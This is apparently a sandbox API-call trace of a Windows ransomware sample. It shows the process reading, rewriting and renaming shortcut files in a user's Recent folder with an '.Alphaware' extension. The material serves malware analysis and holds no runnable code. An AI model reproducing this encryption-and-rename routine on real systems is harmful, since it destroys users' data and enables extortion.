GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RBnxFLdoe6j5FMDq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rbnxfldoe6j5fmdq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2509120 | out: lpFileInformation=0x2509120*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce6bcbc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1762d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1762d60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x942)) returned 1 [0098.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.314] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RBnxFLdoe6j5FMDq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rbnxfldoe6j5fmdq.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.314] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.314] ReadFile (in: hFile=0x250, lpBuffer=0x2509d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2509d78*, lpNumberOfBytesRead=0x23e958*=0x942, lpOverlapped=0x0) returned 1 [0098.338] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.338] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RBnxFLdoe6j5FMDq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rbnxfldoe6j5fmdq.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.339] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RBnxFLdoe6j5FMDq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rbnxfldoe6j5fmdq.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce6bcbc0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1762d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ccfbbe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd34)) returned 1 [0098.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.341] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RBnxFLdoe6j5FMDq.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rbnxfldoe6j5fmdq.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RBnxFLdoe6j5FMDq.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rbnxfldoe6j5fmdq.lnk.alphaware")) returned 1 [0098.342] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RkF0hT0Xfp-m3q.lnk", dwFileAttributes=0x80) returned 1 [0098.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.343] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RkF0hT0Xfp-m3q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkf0ht0xfp-m3q.lnk"), fInfoLevelId=0x0, lpFileInformation=0x258eb08 | out: lpFileInformation=0x258eb08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd0da00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9ea)) returned 1 [0098.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.343] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RkF0hT0Xfp-m3q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkf0ht0xfp-m3q.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.343] ReadFile (in: hFile=0x250, lpBuffer=0x258f7e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x258f7e8*, lpNumberOfBytesRead=0x23e958*=0x9ea, lpOverlapped=0x0) returned 1 [0098.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.377] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RkF0hT0Xfp-m3q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkf0ht0xfp-m3q.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.380] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RkF0hT0Xfp-m3q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkf0ht0xfp-m3q.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cd6e000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xe08)) returned 1 [0098.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.380] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RkF0hT0Xfp-m3q.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkf0ht0xfp-m3q.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RkF0hT0Xfp-m3q.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkf0ht0xfp-m3q.lnk.alphaware")) returned 1 [0098.382] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rKqcydSq.mkv.lnk", dwFileAttributes=0x80) returned 1 [0098.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.382] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rKqcydSq.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkqcydsq.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2415068 | out: lpFileInformation=0x2415068*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd12a0160, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12a0160, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd12a0160, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3b1)) returned 1 [0098.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.382] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rKqcydSq.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkqcydsq.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.383] ReadFile (in: hFile=0x250, lpBuffer=0x2415710, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2415710*, lpNumberOfBytesRead=0x23e958*=0x3b1, lpOverlapped=0x0) returned 1 [0098.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.408] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rKqcydSq.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkqcydsq.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.410] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rKqcydSq.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkqcydsq.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd12a0160, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd12a0160, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cdba2c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5c8)) returned 1 [0098.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.410] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rKqcydSq.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkqcydsq.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rKqcydSq.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rkqcydsq.mkv.lnk.alphaware")) returned 1 [0098.412] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rmPQA vuvasucn14.mkv.lnk", dwFileAttributes=0x80) returned 1 [0098.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.412] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rmPQA vuvasucn14.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rmpqa vuvasucn14.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24971b8 | out: lpFileInformation=0x24971b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0007580, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x240)) returned 1 [0098.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.412] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rmPQA vuvasucn14.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rmpqa vuvasucn14.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.412] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.413] ReadFile (in: hFile=0x250, lpBuffer=0x2497728, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2497728*, lpNumberOfBytesRead=0x23e958*=0x240, lpOverlapped=0x0) returned 1 [0098.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.435] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rmPQA vuvasucn14.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rmpqa vuvasucn14.mkv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.437] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.437] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rmPQA vuvasucn14.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rmpqa vuvasucn14.mkv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0007580, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0007580, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8cde0420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0)) returned 1 [0098.437] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.438] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rmPQA vuvasucn14.mkv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rmpqa vuvasucn14.mkv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\rmPQA vuvasucn14.mkv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\rmpqa vuvasucn14.mkv.lnk.alphaware")) returned 1 [0098.439] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk", dwFileAttributes=0x80) returned 1 [0098.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.440] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2517c68 | out: lpFileInformation=0x2517c68*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xce8d1f00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16a4680, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16a4680, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x2e2)) returned 1 [0098.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.440] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.440] ReadFile (in: hFile=0x250, lpBuffer=0x25181e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25181e8*, lpNumberOfBytesRead=0x23e958*=0x2e2, lpOverlapped=0x0) returned 1 [0098.464] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.464] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce8d1f00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16a4680, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ce2c6e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4b4)) returned 1 [0098.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.467] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk.alphaware")) returned 1 [0098.468] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s4xZHJNmFEW_-to_l.lnk", dwFileAttributes=0x80) returned 1 [0098.468] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.468] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s4xZHJNmFEW_-to_l.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s4xzhjnmfew_-to_l.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2598d20 | out: lpFileInformation=0x2598d20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfd33b60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd33b60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfd33b60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x245)) returned 1 [0098.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.469] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s4xZHJNmFEW_-to_l.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s4xzhjnmfew_-to_l.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.469] ReadFile (in: hFile=0x250, lpBuffer=0x2599278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2599278*, lpNumberOfBytesRead=0x23e958*=0x245, lpOverlapped=0x0) returned 1 [0098.498] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.498] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s4xZHJNmFEW_-to_l.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s4xzhjnmfew_-to_l.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.499] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.501] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.501] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s4xZHJNmFEW_-to_l.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s4xzhjnmfew_-to_l.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd33b60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd33b60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ce789a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x3e0)) returned 1 [0098.501] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0098.501] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s4xZHJNmFEW_-to_l.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s4xzhjnmfew_-to_l.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s4xZHJNmFEW_-to_l.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s4xzhjnmfew_-to_l.lnk.alphaware")) returned 1 [0098.502] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s8ZDF Lucr_Z28Spu.swf.lnk", dwFileAttributes=0x80) returned 1 [0098.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0098.503] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s8ZDF Lucr_Z28Spu.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s8zdf lucr_z28spu.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2419028 | out: lpFileInformation=0x2419028*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd13849a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13849a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd13849a0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x3de)) returned 1 [0098.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0098.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0098.503] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s8ZDF Lucr_Z28Spu.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s8zdf lucr_z28spu.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0098.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0098.503] ReadFile (in: hFile=0x250, lpBuffer=0x2419720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2419720*, lpNumberOfBytesRead=0x23e958*=0x3de, lpOverlapped=0x0) returned 1 [0098.528] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0098.528] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s8ZDF Lucr_Z28Spu.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s8zdf lucr_z28spu.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0098.529] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0098.530] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0098.530] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\s8ZDF Lucr_Z28Spu.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\s8zdf lucr_z28spu.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13849a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd13849a0, 